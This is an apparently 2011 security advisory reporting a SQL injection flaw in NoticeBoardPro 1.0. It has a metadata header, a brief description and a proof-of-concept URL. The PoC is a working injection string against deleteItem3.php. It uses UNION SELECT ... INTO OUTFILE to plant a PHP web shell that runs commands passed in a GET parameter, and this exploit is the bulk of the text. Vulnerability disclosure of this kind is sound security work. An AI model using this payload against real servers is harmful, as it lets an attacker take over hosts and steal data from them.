A SQL injection vulnerability in NoticeBoardPro version 1.0 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell.
7bc77fa2826526d53979b3c39a01fcc657ba86945a552ee4b77da29a7dfbdbf1
# ------------------------------------------------------------------------
# Software................NoticeBoardPro 1.0
# Vulnerability...........SQL Injection
# Threat Level............Critical (4/5)
# Download................http://www.NoticeBoardPro.com/
# Discovery Date..........5/11/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A sql injection vulnerability in NoticeBoardPro 1.0 can be exploited
# to extract arbitrary data. In some environments it may be possible to
# create a PHP shell.
#
#
# --PoC--
http://localhost/noticeboardpro/deleteItem3.php?noticeID=&userID='and%201=0%20UNION%20SELECT%20'%3C?php%20echo%20system($_GET[%22CMD%22]);%20?%3E','','','','','','','','','','',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23